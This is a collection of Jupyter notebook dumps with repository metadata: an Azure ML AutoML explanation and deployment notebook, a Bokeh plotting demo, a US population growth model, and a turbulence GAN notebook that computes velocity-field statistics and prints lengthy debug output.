'regression') # Training task type\n# Name of your training dataset register with your workspace\ncontent = content.replace('<<train_dataset_name>>', 'machineData_train_dataset') \n# Name of your test dataset register with your workspace\ncontent = content.replace('<<test_dataset_name>>', 'machineData_test_dataset')\n\n# Write sample file into your script folder.\nwith open(script_file_name, 'w') as cefw:\n cefw.write(content)", "_____no_output_____" ] ], [ [ "#### Create conda configuration for model explanations experiment from automl_run object", "_____no_output_____" ] ], [ [ "from azureml.core.runconfig import RunConfiguration\nfrom azureml.core.conda_dependencies import CondaDependencies\nimport pkg_resources\n\n# create a new RunConfig object\nconda_run_config = RunConfiguration(framework=\"python\")\n\n# Set compute target to AmlCompute\nconda_run_config.target = compute_target\nconda_run_config.environment.docker.enabled = True\n\n# specify CondaDependencies obj\nconda_run_config.environment.python.conda_dependencies = automl_run.get_environment().python.conda_dependencies", "_____no_output_____" ] ], [ [ "#### Submit the experiment for model explanations\nSubmit the experiment with the above `run_config` and the sample script for computing explanations.", "_____no_output_____" ] ], [ [ "# Now submit a run on AmlCompute for model explanations\nfrom azureml.core.script_run_config import ScriptRunConfig\n\nscript_run_config = ScriptRunConfig(source_directory=script_folder,\n script='train_explainer.py',\n run_config=conda_run_config)\n\nrun = experiment.submit(script_run_config)\n\n# Show run details\nrun", "_____no_output_____" ], [ "%%time\n# Shows output of the run on stdout.\nrun.wait_for_completion(show_output=True)", "_____no_output_____" ] ], [ [ "### Feature importance and visualizing explanation dashboard\nIn this section we describe how you can download the explanation results from the explanations experiment and visualize the feature importance for your AutoML model on the azure portal.", "_____no_output_____" ], [ "#### Download engineered feature importance from artifact store\nYou can use *ExplanationClient* to download the engineered feature explanations from the artifact store of the *automl_run*. You can also use azure portal url to view the dash board visualization of the feature importance values of the engineered features.", "_____no_output_____" ] ], [ [ "from azureml.explain.model._internal.explanation_client import ExplanationClient\nclient = ExplanationClient.from_run(automl_run)\nengineered_explanations = client.download_model_explanation(raw=False, comment='engineered explanations')\nprint(engineered_explanations.get_feature_importance_dict())\nprint(\"You can visualize the engineered explanations under the 'Explanations (preview)' tab in the AutoML run at:-\\n\" + automl_run.get_portal_url())", "_____no_output_____" ] ], [ [ "#### Download raw feature importance from artifact store\nYou can use *ExplanationClient* to download the raw feature explanations from the artifact store of the *automl_run*. You can also use azure portal url to view the dash board visualization of the feature importance values of the raw features.", "_____no_output_____" ] ], [ [ "raw_explanations = client.download_model_explanation(raw=True, comment='raw explanations')\nprint(raw_explanations.get_feature_importance_dict())\nprint(\"You can visualize the raw explanations under the 'Explanations (preview)' tab in the AutoML run at:-\\n\" + automl_run.get_portal_url())", "_____no_output_____" ] ], [ [ "## Operationailze\nIn this section we will show how you can operationalize an AutoML model and the explainer which was used to compute the explanations in the previous section.\n\n### Register the AutoML model and the scoring explainer\nWe use the *TreeScoringExplainer* from *azureml.explain.model* package to create the scoring explainer which will be used to compute the raw and engineered feature importances at the inference time. \nIn the cell below, we register the AutoML model and the scoring explainer with the Model Management Service.", "_____no_output_____" ] ], [ [ "# Register trained automl model present in the 'outputs' folder in the artifacts\noriginal_model = automl_run.register_model(model_name='automl_model', \n model_path='outputs/model.pkl')\nscoring_explainer_model = automl_run.register_model(model_name='scoring_explainer',\n model_path='outputs/scoring_explainer.pkl')", "_____no_output_____" ] ], [ [ "### Create the conda dependencies for setting up the service\nWe need to create the conda dependencies comprising of the *azureml-explain-model*, *azureml-train-automl* and *azureml-defaults* packages. ", "_____no_output_____" ] ], [ [ "conda_dep = automl_run.get_environment().python.conda_dependencies\n\nwith open(\"myenv.yml\",\"w\") as f:\n f.write(conda_dep.serialize_to_string())\n\nwith open(\"myenv.yml\",\"r\") as f:\n print(f.read())", "_____no_output_____" ] ], [ [ "### View your scoring file", "_____no_output_____" ] ], [ [ "with open(\"score_explain.py\",\"r\") as f:\n print(f.read())", "_____no_output_____" ] ], [ [ "### Deploy the service\nIn the cell below, we deploy the service using the conda file and the scoring file from the previous steps. ", "_____no_output_____" ] ], [ [ "from azureml.core.webservice import Webservice\nfrom azureml.core.model import InferenceConfig\nfrom azureml.core.webservice import AciWebservice\nfrom azureml.core.model import Model\nfrom azureml.core.environment import Environment\n\naciconfig = AciWebservice.deploy_configuration(cpu_cores=1, \n memory_gb=1, \n tags={\"data\": \"Machine Data\", \n \"method\" : \"local_explanation\"}, \n description='Get local explanations for Machine test data')\n\nmyenv = Environment.from_conda_specification(name=\"myenv\", file_path=\"myenv.yml\")\ninference_config = InferenceConfig(entry_script=\"score_explain.py\", environment=myenv)\n\n# Use configs and models generated above\nservice = Model.deploy(ws, 'model-scoring', [scoring_explainer_model, original_model], inference_config, aciconfig)\nservice.wait_for_deployment(show_output=True)", "_____no_output_____" ] ], [ [ "### View the service logs", "_____no_output_____" ] ], [ [ "service.get_logs()", "_____no_output_____" ] ], [ [ "### Inference using some test data\nInference using some test data to see the predicted value from autml model, view the engineered feature importance for the predicted value and raw feature importance for the predicted value.", "_____no_output_____" ] ], [ [ "if service.state == 'Healthy':\n X_test = test_data.drop_columns([label]).to_pandas_dataframe()\n # Serialize the first row of the test data into json\n X_test_json = X_test[:1].to_json(orient='records')\n print(X_test_json)\n # Call the service to get the predictions and the engineered and raw explanations\n output = service.run(X_test_json)\n # Print the predicted value\n print(output['predictions'])\n # Print the engineered feature importances for the predicted value\n print(output['engineered_local_importance_values'])\n # Print the raw feature importances for the predicted value\n print(output['raw_local_importance_values'])", "_____no_output_____" ] ], [ [ "### Delete the service\nDelete the service once you have finished inferencing.", "_____no_output_____" ] ], [ [ "service.delete()", "_____no_output_____" ] ], [ [ "## Test", "_____no_output_____" ] ], [ [ "# preview the first 3 rows of the dataset\n\ntest_data = test_data.to_pandas_dataframe()\ny_test = test_data['ERP'].fillna(0)\ntest_data = test_data.drop('ERP', 1)\ntest_data = test_data.fillna(0)\n\n\ntrain_data = train_data.to_pandas_dataframe()\ny_train = train_data['ERP'].fillna(0)\ntrain_data = train_data.drop('ERP', 1)\ntrain_data = train_data.fillna(0)", "_____no_output_____" ], [ "y_pred_train = fitted_model.predict(train_data)\ny_residual_train = y_train - y_pred_train\n\ny_pred_test = fitted_model.predict(test_data)\ny_residual_test = y_test - y_pred_test", "_____no_output_____" ], [ "%matplotlib inline\nfrom sklearn.metrics import mean_squared_error, r2_score\n\n# Set up a multi-plot chart.\nf, (a0, a1) = plt.subplots(1, 2, gridspec_kw = {'width_ratios':[1, 1], 'wspace':0, 'hspace': 0})\nf.suptitle('Regression Residual Values', fontsize = 18)\nf.set_figheight(6)\nf.set_figwidth(16)\n\n# Plot residual values of training set.\na0.axis([0, 360, -100, 100])\na0.plot(y_residual_train, 'bo', alpha = 0.5)\na0.plot([-10,360],[0,0], 'r-', lw = 3)\na0.text(16,170,'RMSE = {0:.2f}'.format(np.sqrt(mean_squared_error(y_train, y_pred_train))), fontsize = 12)\na0.text(16,140,'R2 score = {0:.2f}'.format(r2_score(y_train, y_pred_train)),fontsize = 12)\na0.set_xlabel('Training samples', fontsize = 12)\na0.set_ylabel('Residual Values', fontsize = 12)\n\n# Plot residual values of test set.\na1.axis([0, 90, -100, 100])\na1.plot(y_residual_test, 'bo', alpha = 0.5)\na1.plot([-10,360],[0,0], 'r-', lw = 3)\na1.text(5,170,'RMSE = {0:.2f}'.format(np.sqrt(mean_squared_error(y_test, y_pred_test))), fontsize = 12)\na1.text(5,140,'R2 score = {0:.2f}'.format(r2_score(y_test, y_pred_test)),fontsize = 12)\na1.set_xlabel('Test samples', fontsize = 12)\na1.set_yticklabels([])\n\nplt.show()", "_____no_output_____" ], [ "%matplotlib inline\ntest_pred = plt.scatter(y_test, y_pred_test, color='')\ntest_test = plt.scatter(y_test, y_test, color='g')\nplt.legend((test_pred, test_test), ('prediction', 'truth'), loc='upper left', fontsize=8)\nplt.show()", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ] ]
e730c63eacacb69294fc81c32022d8341f205a13
9,346
ipynb
Jupyter Notebook
Semana_1/Untitled.ipynb
sebastiangonzalezv/examen_estadistica
13429fb7a0f425c650a6f3ba5fa051696a2e23c3
[ "MIT" ]
null
null
null
Semana_1/Untitled.ipynb
sebastiangonzalezv/examen_estadistica
13429fb7a0f425c650a6f3ba5fa051696a2e23c3
[ "MIT" ]
4
2021-08-23T20:44:21.000Z
2022-03-12T00:29:34.000Z
Semana_1/Untitled.ipynb
sebastiangonzalezv/examen_estadistica
13429fb7a0f425c650a6f3ba5fa051696a2e23c3
[ "MIT" ]
null
null
null
56.642424
3,851
0.535416
[ [ [ "\n\nimport bokeh.sampledata\nbokeh.sampledata.download()\n\nimport numpy as np # we will use this later, so import it now\n\nfrom bokeh.io import output_notebook, show\nfrom bokeh.plotting import figure\n\n\n\nimport bokeh.sampledata\nbokeh.sampledata.download()\n\np = figure(plot_width=400, plot_height=400)\n\n# add a circle renderer with x and y coordinates, size, color, and alpha\np.circle([1, 2, 3, 4, 5], [6, 7, 2, 4, 5], size=15, line_color=\"navy\", fill_color=\"orange\", fill_alpha=0.5)\n\nshow(p) # show the results", "Using data directory: C:\\Users\\sebas\\.bokeh\\data\nSkipping 'CGM.csv' (checksum match)\nSkipping 'US_Counties.zip' (checksum match)\nSkipping 'us_cities.json' (checksum match)\nSkipping 'unemployment09.csv' (checksum match)\nSkipping 'AAPL.csv' (checksum match)\nSkipping 'FB.csv' (checksum match)\nSkipping 'GOOG.csv' (checksum match)\nSkipping 'IBM.csv' (checksum match)\nSkipping 'MSFT.csv' (checksum match)\nSkipping 'WPP2012_SA_DB03_POPULATION_QUINQUENNIAL.zip' (checksum match)\nSkipping 'gapminder_fertility.csv' (checksum match)\nSkipping 'gapminder_population.csv' (checksum match)\nSkipping 'gapminder_life_expectancy.csv' (checksum match)\nSkipping 'gapminder_regions.csv' (checksum match)\nSkipping 'world_cities.zip' (checksum match)\nSkipping 'airports.json' (checksum match)\nSkipping 'movies.db.zip' (checksum match)\nSkipping 'airports.csv' (checksum match)\nSkipping 'routes.csv' (checksum match)\nSkipping 'haarcascade_frontalface_default.xml' (checksum match)\nUsing data directory: C:\\Users\\sebas\\.bokeh\\data\nSkipping 'CGM.csv' (checksum match)\nSkipping 'US_Counties.zip' (checksum match)\nSkipping 'us_cities.json' (checksum match)\nSkipping 'unemployment09.csv' (checksum match)\nSkipping 'AAPL.csv' (checksum match)\nSkipping 'FB.csv' (checksum match)\nSkipping 'GOOG.csv' (checksum match)\nSkipping 'IBM.csv' (checksum match)\nSkipping 'MSFT.csv' (checksum match)\nSkipping 'WPP2012_SA_DB03_POPULATION_QUINQUENNIAL.zip' (checksum match)\nSkipping 'gapminder_fertility.csv' (checksum match)\nSkipping 'gapminder_population.csv' (checksum match)\nSkipping 'gapminder_life_expectancy.csv' (checksum match)\nSkipping 'gapminder_regions.csv' (checksum match)\nSkipping 'world_cities.zip' (checksum match)\nSkipping 'airports.json' (checksum match)\nSkipping 'movies.db.zip' (checksum match)\nSkipping 'airports.csv' (checksum match)\nSkipping 'routes.csv' (checksum match)\nSkipping 'haarcascade_frontalface_default.xml' (checksum match)\n" ] ] ]
[ "code" ]
[ [ "code" ] ]
e730cbaecda85ec4beba3da46f110f0f7b7e0f86
44,937
ipynb
Jupyter Notebook
code/Modsim_project_1.ipynb
ttandler/ModSimPy
92e8257ef2e63b7aa8629d220a81933e7706a760
[ "MIT" ]
null
null
null
code/Modsim_project_1.ipynb
ttandler/ModSimPy
92e8257ef2e63b7aa8629d220a81933e7706a760
[ "MIT" ]
null
null
null
code/Modsim_project_1.ipynb
ttandler/ModSimPy
92e8257ef2e63b7aa8629d220a81933e7706a760
[ "MIT" ]
null
null
null
65.697368
17,552
0.756192
[ [ [ "# Configure Jupyter so figures appear in the notebook\n%matplotlib inline\n\n# Configure Jupyter to display the assigned value after an assignment\n%config InteractiveShell.ast_node_interactivity='last_expr_or_assign'\n\n# import functions from the modsim.py module\nfrom modsim import *\n\n#from pandas import read_html\n\nimport pandas as pd", "_____no_output_____" ], [ "data = pd.read_csv(\"US_population.csv\",index_col ='year')\npop = data.population /1e6\npop_df = pop", "_____no_output_____" ], [ "pop [1900]", "_____no_output_____" ], [ "plot (pop,':', label ='US Population')\ndecorate(xlabel='Year',\n ylabel='US Population (million)')\nsavefig('figs/proj01-fig01.png')", "Saving figure to file figs/proj01-fig01.png\n" ], [ "t_0 = 1900\nt_gd_start = 1928\nt_gd_end = 1941\nt_norm_start = t_gd_end + 1\nt_norm_end = 2018\nelapsed_time_bgd = t_gd_start - t_0", "_____no_output_____" ], [ "p_0 = pop[t_0]", "_____no_output_____" ], [ "p_gd_start = pop[t_gd_start]", "_____no_output_____" ], [ "deltap_bgd = p_gd_start - p_0", "_____no_output_____" ], [ "growth_rate_bgd = deltap_bgd/elapsed_time_bgd", "_____no_output_____" ], [ "pop_df = pop [(pop.index >= t_0) & (pop.index <= t_gd_start -1)]", "_____no_output_____" ], [ "system = System(t_0 = t_0,\n t_gd_start = t_gd_start,\n t_gd_end = t_gd_end,\n t_norm_start = t_norm_start,\n t_norm_end = t_norm_end,\n p_0 = p_0,\n p_gd_start = p_gd_start,\n growth_rate_bgd = growth_rate_bgd,\n alpha = 0.023,\n beta = 0.00135)", "_____no_output_____" ], [ "def run_simulation (system, update_func):\n results = TimeSeries()\n results[system.t_gd_start] = system.p_gd_start\n \n for t in linrange(system.t_gd_start, system.t_gd_end):\n results[t+1] = update_func(results[t], t, system)\n \n return results", "_____no_output_____" ], [ "def update_func_quad (pop,t,system):\n return pop + growth_rate_bgd\n\nresults = run_simulation (system, update_func_quad)", "_____no_output_____" ], [ "plot (pop_df + results, ':',label = \"US pop\")\ndecorate(xlabel='Year',\n ylabel='US Population (million)')\nsavefig('figs/proj01-fig02.png')", "Saving figure to file figs/proj01-fig02.png\n" ], [ "results_df = results.df ()", "_____no_output_____" ], [ "pop_df", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e730d9f19cd6ea6678837813b9647c89ae7e35bc
485,701
ipynb
Jupyter Notebook
lstm_gan_isoturb1D.ipynb
ferngonzalezp/turbulence-GAN
a215a3c5af2dc9a723f95c344e295ecc08954f26
[ "MIT" ]
1
2020-03-16T12:17:22.000Z
2020-03-16T12:17:22.000Z
lstm_gan_isoturb1D.ipynb
ferngonzalezp/turbulence-GAN
a215a3c5af2dc9a723f95c344e295ecc08954f26
[ "MIT" ]
null
null
null
lstm_gan_isoturb1D.ipynb
ferngonzalezp/turbulence-GAN
a215a3c5af2dc9a723f95c344e295ecc08954f26
[ "MIT" ]
null
null
null
68.864455
30,428
0.678557
[ [ [ "<a href=\"https://colab.research.google.com/github/ferngonzalezp/turbulence-GAN/blob/master/lstm_gan_isoturb1D.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ] ], [ [ "%matplotlib inline", "_____no_output_____" ], [ "from __future__ import print_function\n#%matplotlib inline\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom IPython.display import HTML\n\n\n# Set random seem for reproducibility\nmanualSeed = 999\n#manualSeed = random.randint(1, 10000) # use if you want new results\nprint(\"Random Seed: \", manualSeed)\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)", "Random Seed: 999\n" ], [ "buffer_size = 1\nu = np.zeros((buffer_size,128,128,128))\nv = np.zeros((buffer_size,128,128,128))\nw = np.zeros((buffer_size,128,128,128))\nfor i in range(buffer_size):\n u[i] = (np.load('/content/drive/My Drive/turbulent_data/%d/u_cbc_128.128.128_10000_modes.npy' %(i)))\n v[i] = (np.load('/content/drive/My Drive/turbulent_data/%d/v_cbc_128.128.128_10000_modes.npy' %(i)))\n w[i] = (np.load('/content/drive/My Drive/turbulent_data/%d/w_cbc_128.128.128_10000_modes.npy' %(i)))", "_____no_output_____" ], [ "field = torch.tensor((u,v,w),dtype=torch.float32)\nfield = field.transpose(0,1)\nfield.shape", "_____no_output_____" ], [ "!pip install -U -q PyDrive\nfrom pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\nfrom google.colab import auth\nfrom oauth2client.client import GoogleCredentials# Authenticate and create the PyDrive client.\nauth.authenticate_user()\ngauth = GoogleAuth()\ngauth.credentials = GoogleCredentials.get_application_default()\ndrive = GoogleDrive(gauth)", "_____no_output_____" ], [ "link = 'https://drive.google.com/open?id=14YO19ftGkb0Jm28JGGdHJdE5OeBb8BbP' # The shareable link", "_____no_output_____" ], [ "fluff, id = link.split('=')\n\nprint (id) # Verify that you have everything after '='", "14YO19ftGkb0Jm28JGGdHJdE5OeBb8BbP\n" ], [ "downloaded = drive.CreateFile({'id':id}) \ndownloaded.GetContentFile('tkespec.py') ", "_____no_output_____" ], [ "import tkespec", "_____no_output_____" ], [ "lx = 2*np.pi*9/100\nly = lx\nlz = lx", "_____no_output_____" ], [ "knyquist, wave_numbers, tke_spectrum = tkespec.compute_tke_spectrum(u[0],v[0],w[0],lx,ly,lz,True)", "knorm = 11.111111111111109\n" ], [ "plt.xscale(\"log\")\nplt.plot(wave_numbers,tke_spectrum)", "_____no_output_____" ], [ "def cov(x,y):\n term1 = torch.mean([email protected](1,2),dim=(0,1))\n term2 = torch.mean(x,dim=(0,1))@torch.mean(y,dim=(0,1)).transpose(2,3)\n return term1 - term2", "_____no_output_____" ], [ "def point_corr(x,y):\n vx = x - torch.mean(x)\n vy = y - torch.mean(y)\n\n return torch.mean(vx * vy,dim=(0,1,3)) / (torch.sqrt(torch.mean(vx ** 2, dim=(0,1,3))) * torch.sqrt(torch.mean(vy ** 2,dim=(0,1,3))))", "_____no_output_____" ], [ "def stream_m(x):\n return torch.mean(x, dim=(0,1,3))", "_____no_output_____" ], [ "def rms(x):\n return torch.mean(x**2, dim=(0,1,3))", "_____no_output_____" ], [ "Ruv = point_corr(field[:,0],field[:,1])\nplt.plot(Ruv)", "_____no_output_____" ], [ "stream_mu = stream_m(field[:,0])\nplt.plot(stream_mu)", "_____no_output_____" ], [ "rms_u = rms(field[:,0])\nplt.plot(rms_u)", "_____no_output_____" ] ], [ [ "#Extract 1D signal from flow field", "_____no_output_____" ] ], [ [ "train_sigs = field[:,0].reshape(field.shape[0]*128*128,1,128)", "_____no_output_____" ], [ "plt.plot(train_sigs[np.random.randint(0,train_sigs.shape[0]),0])", "_____no_output_____" ], [ "print(torch.mean(train_sigs[:,0]))\nprint(torch.std(train_sigs[:,0]))", "tensor(0.0004)\ntensor(0.2208)\n" ], [ "def auto_cor(v):\n v = v.detach()\n result = 0\n for i in range(v.shape[0]):\n result += np.correlate(v[i],v[i],mode='full')\n result /= v.shape[0]\n result = torch.tensor(result)\n return result/result.max()", "_____no_output_____" ], [ "Ruu = auto_cor(train_sigs[:,0,:])\nplt.plot(Ruu)", "_____no_output_____" ], [ "knyquist, wave_numbers, tke_spectrum = tkespec.compute_tke_spectrum_1d(u[0],lx,ly,lz,True)", "\u001b[1;30;43mStreaming output truncated to the last 5000 lines.\u001b[0m\nk = 41\nk = 40\nk = 40\nk = 40\nk = 40\nk = 40\nk = 40\nk = 39\nk = 39\nk = 39\nk = 39\nk = 39\nk = 39\nk = 39\nk = 40\nk = 40\nk = 40\nk = 40\nk = 41\nk = 41\nk = 41\nk = 41\nk = 42\nk = 42\nk = 43\nk = 43\nk = 43\nk = 44\nk = 44\nk = 45\nk = 45\nk = 46\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 52\nk = 53\nk = 54\nk = 54\nk = 55\nk = 56\nk = 57\nk = 57\nk = 58\nk = 59\nk = 60\nk = 60\nk = 61\nk = 62\nk = 63\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 67\nk = 68\nk = 69\nk = 70\nk = 71\nk = 72\nk = 72\nk = 73\nk = 74\nk = 75\nk = 74\nk = 73\nk = 72\nk = 72\nk = 71\nk = 70\nk = 69\nk = 68\nk = 67\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 63\nk = 62\nk = 61\nk = 60\nk = 60\nk = 59\nk = 58\nk = 57\nk = 57\nk = 56\nk = 55\nk = 54\nk = 54\nk = 53\nk = 52\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 46\nk = 45\nk = 45\nk = 44\nk = 44\nk = 43\nk = 43\nk = 43\nk = 42\nk = 42\nk = 41\nk = 41\nk = 41\nk = 41\nk = 40\nk = 40\nk = 40\nk = 40\nk = 39\nk = 39\nk = 39\nk = 39\nk = 39\nk = 39\nk = 38\nk = 38\nk = 38\nk = 38\nk = 38\nk = 38\nk = 38\nk = 39\nk = 39\nk = 39\nk = 39\nk = 40\nk = 40\nk = 40\nk = 41\nk = 41\nk = 41\nk = 42\nk = 42\nk = 42\nk = 43\nk = 43\nk = 44\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 52\nk = 53\nk = 54\nk = 54\nk = 55\nk = 56\nk = 57\nk = 57\nk = 58\nk = 59\nk = 60\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 69\nk = 70\nk = 71\nk = 72\nk = 73\nk = 74\nk = 74\nk = 74\nk = 73\nk = 72\nk = 71\nk = 70\nk = 69\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 60\nk = 59\nk = 58\nk = 57\nk = 57\nk = 56\nk = 55\nk = 54\nk = 54\nk = 53\nk = 52\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 44\nk = 43\nk = 43\nk = 42\nk = 42\nk = 42\nk = 41\nk = 41\nk = 41\nk = 40\nk = 40\nk = 40\nk = 39\nk = 39\nk = 39\nk = 39\nk = 38\nk = 38\nk = 38\nk = 38\nk = 38\nk = 38\nk = 37\nk = 37\nk = 37\nk = 37\nk = 37\nk = 37\nk = 37\nk = 38\nk = 38\nk = 38\nk = 38\nk = 39\nk = 39\nk = 39\nk = 40\nk = 40\nk = 40\nk = 41\nk = 41\nk = 42\nk = 42\nk = 43\nk = 43\nk = 44\nk = 44\nk = 45\nk = 45\nk = 46\nk = 46\nk = 47\nk = 48\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 52\nk = 53\nk = 54\nk = 54\nk = 55\nk = 56\nk = 57\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 70\nk = 70\nk = 71\nk = 72\nk = 73\nk = 74\nk = 73\nk = 72\nk = 71\nk = 70\nk = 70\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 57\nk = 56\nk = 55\nk = 54\nk = 54\nk = 53\nk = 52\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 48\nk = 47\nk = 46\nk = 46\nk = 45\nk = 45\nk = 44\nk = 44\nk = 43\nk = 43\nk = 42\nk = 42\nk = 41\nk = 41\nk = 40\nk = 40\nk = 40\nk = 39\nk = 39\nk = 39\nk = 38\nk = 38\nk = 38\nk = 38\nk = 37\nk = 37\nk = 37\nk = 37\nk = 37\nk = 37\nk = 36\nk = 36\nk = 36\nk = 36\nk = 36\nk = 36\nk = 37\nk = 37\nk = 37\nk = 37\nk = 37\nk = 38\nk = 38\nk = 38\nk = 39\nk = 39\nk = 39\nk = 40\nk = 40\nk = 41\nk = 41\nk = 42\nk = 42\nk = 43\nk = 43\nk = 44\nk = 44\nk = 45\nk = 46\nk = 46\nk = 47\nk = 48\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 52\nk = 53\nk = 54\nk = 55\nk = 55\nk = 56\nk = 57\nk = 58\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 67\nk = 68\nk = 69\nk = 70\nk = 71\nk = 72\nk = 73\nk = 73\nk = 73\nk = 72\nk = 71\nk = 70\nk = 69\nk = 68\nk = 67\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 58\nk = 57\nk = 56\nk = 55\nk = 55\nk = 54\nk = 53\nk = 52\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 48\nk = 47\nk = 46\nk = 46\nk = 45\nk = 44\nk = 44\nk = 43\nk = 43\nk = 42\nk = 42\nk = 41\nk = 41\nk = 40\nk = 40\nk = 39\nk = 39\nk = 39\nk = 38\nk = 38\nk = 38\nk = 37\nk = 37\nk = 37\nk = 37\nk = 37\nk = 36\nk = 36\nk = 36\nk = 36\nk = 36\nk = 35\nk = 35\nk = 35\nk = 35\nk = 35\nk = 35\nk = 36\nk = 36\nk = 36\nk = 36\nk = 36\nk = 37\nk = 37\nk = 37\nk = 38\nk = 38\nk = 38\nk = 39\nk = 39\nk = 40\nk = 40\nk = 41\nk = 41\nk = 42\nk = 42\nk = 43\nk = 44\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 52\nk = 53\nk = 54\nk = 55\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 69\nk = 70\nk = 71\nk = 72\nk = 73\nk = 72\nk = 71\nk = 70\nk = 69\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 55\nk = 54\nk = 53\nk = 52\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 44\nk = 43\nk = 42\nk = 42\nk = 41\nk = 41\nk = 40\nk = 40\nk = 39\nk = 39\nk = 38\nk = 38\nk = 38\nk = 37\nk = 37\nk = 37\nk = 36\nk = 36\nk = 36\nk = 36\nk = 36\nk = 35\nk = 35\nk = 35\nk = 35\nk = 35\nk = 34\nk = 34\nk = 34\nk = 34\nk = 34\nk = 34\nk = 35\nk = 35\nk = 35\nk = 35\nk = 35\nk = 36\nk = 36\nk = 36\nk = 37\nk = 37\nk = 38\nk = 38\nk = 38\nk = 39\nk = 39\nk = 40\nk = 41\nk = 41\nk = 42\nk = 42\nk = 43\nk = 43\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 53\nk = 53\nk = 54\nk = 55\nk = 56\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 66\nk = 67\nk = 68\nk = 69\nk = 70\nk = 71\nk = 72\nk = 72\nk = 72\nk = 71\nk = 70\nk = 69\nk = 68\nk = 67\nk = 66\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 56\nk = 55\nk = 54\nk = 53\nk = 53\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 43\nk = 43\nk = 42\nk = 42\nk = 41\nk = 41\nk = 40\nk = 39\nk = 39\nk = 38\nk = 38\nk = 38\nk = 37\nk = 37\nk = 36\nk = 